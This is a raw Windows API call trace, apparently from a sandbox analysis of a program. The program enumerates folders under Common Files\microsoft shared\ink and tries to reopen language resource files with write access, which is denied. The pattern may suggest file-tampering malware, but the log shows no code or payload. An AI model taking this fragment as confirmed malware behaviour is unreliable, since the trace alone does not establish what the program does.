dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0100.248] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0100.248] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0100.248] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.248] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.248] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.248] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.248] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75fa8 [0100.248] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x60088 [0100.248] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75fa8 | out: hHeap=0x20000) returned 1 [0100.248] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6dfa8 [0100.248] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x60088 | out: hHeap=0x20000) returned 1 [0100.248] FindNextFileW (in: hFindFile=0x780d0, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa076a7a6, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3a0736, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="ko-KR", cAlternateFileName="")) returned 1 [0100.248] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0100.248] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35230 [0100.248] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e3e8 [0100.248] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6eb58 [0100.248] FindFirstFileExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ja-JP\\*", fInfoLevelId=0x0, lpFindFileData=0x327efb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x327efb8) returned 0x784d0 [0100.248] FindNextFileW (in: hFindFile=0x784d0, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa076a026, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3a0736, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0100.249] FindNextFileW (in: hFindFile=0x784d0, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e9592f9, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e9592f9, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e9592f9, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x1e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0100.249] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6eb58 | out: hHeap=0x20000) returned 1 [0100.249] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.249] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0100.249] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0100.249] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0100.249] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0100.249] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0100.249] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.249] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.249] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0100.249] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e140 [0100.249] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46828 [0100.249] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6dfa8 | out: hHeap=0x20000) returned 1 [0100.249] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0100.249] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35210 [0100.249] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0100.249] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35210 | out: hHeap=0x20000) returned 1 [0100.249] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0100.249] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f30 [0100.249] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0100.249] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f30 | out: hHeap=0x20000) returned 1 [0100.249] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.249] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6eb58 [0100.249] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0100.249] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x4ebc8 [0100.249] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6eb58 | out: hHeap=0x20000) returned 1 [0100.249] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0100.249] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8c8f0 [0100.249] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0100.249] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.249] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.249] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.249] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.249] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c8f0 | out: hHeap=0x20000) returned 1 [0100.249] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.249] AreFileApisANSI () returned 1 [0100.250] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ja-JP\\tipresx.dll.mui", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ja-JP\\tipresx.dll.mui", lpUsedDefaultChar=0x0) returned 73 [0100.250] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d160 [0100.250] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.250] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.250] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0100.250] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0100.250] AreFileApisANSI () returned 1 [0100.250] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d160, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0100.250] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x92) returned 0x85120 [0100.250] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d160, cbMultiByte=-1, lpWideCharStr=0x85120, cchWideChar=73 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ja-JP\\tipresx.dll.mui") returned 73 [0100.250] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ja-JP\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ja-jp\\tipresx.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0100.251] GetFileType (hFile=0x27c) returned 0x1 [0100.251] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85120 | out: hHeap=0x20000) returned 1 [0100.251] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0100.251] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0100.251] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0100.251] CloseHandle (hObject=0x27c) returned 1 [0100.251] AreFileApisANSI () returned 1 [0100.251] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d160, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0100.252] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x92) returned 0x85260 [0100.252] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d160, cbMultiByte=-1, lpWideCharStr=0x85260, cchWideChar=73 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ja-JP\\tipresx.dll.mui") returned 73 [0100.252] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ja-JP\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ja-jp\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0100.252] GetLastError () returned 0x5 [0100.252] GetLastError () returned 0x5 [0100.252] SetLastError (dwErrCode=0x5) [0100.252] GetLastError () returned 0x5 [0100.252] SetLastError (dwErrCode=0x5) [0100.252] GetLastError () returned 0x5 [0100.252] SetLastError (dwErrCode=0x5) [0100.252] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85260 | out: hHeap=0x20000) returned 1 [0100.252] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0100.252] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0100.252] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d160 | out: hHeap=0x20000) returned 1 [0100.252] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.252] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.252] FindNextFileW (in: hFindFile=0x784d0, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x327f510, ftCreationTime.dwHighDateTime=0x90, ftLastAccessTime.dwLowDateTime=0x327f498, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x8d2d0, ftLastWriteTime.dwHighDateTime=0x327f288, nFileSizeHigh=0x90, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="t ", cAlternateFileName="渘Ĉ㪀ā湈Ĉ蘿̧Ḁ")) returned 0 [0100.252] FindClose (in: hFindFile=0x784d0 | out: hFindFile=0x784d0) returned 1 [0100.252] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0100.252] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35190 [0100.252] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0100.252] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35190 | out: hHeap=0x20000) returned 1 [0100.253] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e140 | out: hHeap=0x20000) returned 1 [0100.253] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.253] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e3e8 | out: hHeap=0x20000) returned 1 [0100.253] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0100.253] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35230 | out: hHeap=0x20000) returned 1 [0100.253] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46828 | out: hHeap=0x20000) returned 1 [0100.253] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfd0 [0100.253] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35210 [0100.253] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0100.253] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35210 | out: hHeap=0x20000) returned 1 [0100.253] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0100.253] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35030 [0100.253] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0100.253] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35030 | out: hHeap=0x20000) returned 1 [0100.253] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75e40 [0100.253] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f9a8 [0100.253] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75e40 | out: hHeap=0x20000) returned 1 [0100.253] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6dfa8 [0100.253] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f9a8 | out: hHeap=0x20000) returned 1 [0100.253] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.253] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.253] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.253] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.253] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6dfa8 | out: hHeap=0x20000) returned 1 [0100.253] AreFileApisANSI () returned 1 [0100.253] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ko-KR", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ko-KR", lpUsedDefaultChar=0x0) returned 57 [0100.253] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53490 [0100.253] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.253] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.253] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0100.253] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0100.253] AreFileApisANSI () returned 1 [0100.254] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53490, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0100.254] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x6a3b0 [0100.254] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53490, cbMultiByte=-1, lpWideCharStr=0x6a3b0, cchWideChar=57 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ko-KR") returned 57 [0100.254] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ko-KR" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ko-kr"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0100.254] GetLastError () returned 0x5 [0100.254] GetLastError () returned 0x5 [0100.254] SetLastError (dwErrCode=0x5) [0100.254] GetLastError () returned 0x5 [0100.254] SetLastError (dwErrCode=0x5) [0100.254] GetLastError () returned 0x5 [0100.254] SetLastError (dwErrCode=0x5) [0100.254] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0100.254] AreFileApisANSI () returned 1 [0100.254] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53490, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0100.254] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x69bb0 [0100.254] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53490, cbMultiByte=-1, lpWideCharStr=0x69bb0, cchWideChar=57 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ko-KR") returned 57 [0100.254] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ko-KR" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ko-kr"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0100.254] GetLastError () returned 0x5 [0100.254] GetLastError () returned 0x5 [0100.254] SetLastError (dwErrCode=0x5) [0100.254] GetLastError () returned 0x5 [0100.254] SetLastError (dwErrCode=0x5) [0100.254] GetLastError () returned 0x5 [0100.254] SetLastError (dwErrCode=0x5) [0100.254] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69bb0 | out: hHeap=0x20000) returned 1 [0100.255] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0100.255] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0100.255] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53490 | out: hHeap=0x20000) returned 1 [0100.255] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.255] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.255] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.255] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.255] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76110 [0100.255] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5fe78 [0100.255] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76110 | out: hHeap=0x20000) returned 1 [0100.255] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e2d8 [0100.255] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5fe78 | out: hHeap=0x20000) returned 1 [0100.255] FindNextFileW (in: hFindFile=0x780d0, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa076afd8, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3a0736, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="LanguageModel", cAlternateFileName="LANGUA~1")) returned 1 [0100.255] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.255] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0100.255] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0100.255] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0100.255] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0100.255] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0100.255] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.255] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0100.255] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0100.255] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35230 [0100.255] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6dfa8 [0100.255] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6eb58 [0100.255] FindFirstFileExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ko-KR\\*", fInfoLevelId=0x0, lpFindFileData=0x327efb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x327efb8) returned 0x78410 [0100.255] FindNextFileW (in: hFindFile=0x78410, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa076a7a6, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3a0736, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0100.255] FindNextFileW (in: hFindFile=0x78410, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e933091, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e933091, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e933091, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x1e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0100.255] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6eb58 | out: hHeap=0x20000) returned 1 [0100.255] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.255] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.256] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0100.256] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0100.256] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0100.256] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.256] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.256] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0100.256] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0100.256] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6de98 [0100.256] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x463c8 [0100.256] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e2d8 | out: hHeap=0x20000) returned 1 [0100.256] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0100.256] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f30 [0100.256] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) 